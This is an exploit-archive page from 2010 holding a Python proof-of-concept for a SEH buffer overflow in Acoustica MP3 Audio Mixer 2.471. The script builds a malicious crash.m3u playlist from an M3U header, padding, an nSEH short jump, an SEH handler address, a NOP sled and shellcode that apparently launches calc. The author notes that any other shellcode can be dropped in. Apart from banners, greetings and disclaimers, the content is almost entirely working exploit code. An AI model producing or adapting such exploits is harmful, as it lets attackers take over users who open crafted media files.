Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
Posted on 09 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================== Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH =========================================================== # Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH # Date: September 8 2010 # Author: Carlos Hollmann # Software Link: http://www.acoustica.com/downloading.asp?p=1 # Version: 2.471 # Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8 # CVE : # ________ _ _________ ____ __ _____ ________ # / ____/ / | | / / ____/ | / / //_// _/ | / / ____/ # / __/ / / | | / / __/ / |/ / ,< / // |/ / / __ # / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ / #/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ # COLOMBIA presents............. # PoC from D3V!L FucK3r http://www.exploit-db.com/exploits/9213/ # # Carlos Mario Penagos Hollmann A.K.A Elvenking shogilord@gmail.com # Extended M3U directives # Background from http://hanna.pyxidis.org/tech/m3u.html # The software doesn't handle correctly M3U's header and extra info when is being imported on a open sound group. # Trigger: launch app, open an existing sound group i.e(C:Program FilesAcoustica MP3 Audio Mixerexample.sgp) then import the crash.m3u and....KaaaaBooom!! # # # Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia # !!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!! # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # I do not want anyone to use this script # for malicious and/or illegal purposes # I cannot be held responsible for any illegal use. # Note : you are not allowed to edit/modify this code. # If you do, I will not be held responsible for any damages this may cause. #!/usr/bin/python magic = "crash.m3u" vuln = "x23x0Dx0Ax23x0Dx0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any value x1b,x0a......... junk = "x41" * 816 ds_eax = "x25x25x47x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX morejunk = "x42" * 8308 nSEH = "xEBx06x90x90" #short jmp 6 bytes SEH = "x3Fx28xD1x72"#SEH Handler nops = "x90" * 10 #landing padd shellcode = "x8bxecx55x8bxecx68x20x20x20x2fx68x63x61x6cx63x8dx45xf8x50xb8xc7x93xc2x77xffxd0" # Thanks sud0, any other shell works too just remove "x00x0a" payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode file = open(magic , 'w') file.write(payload) file.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
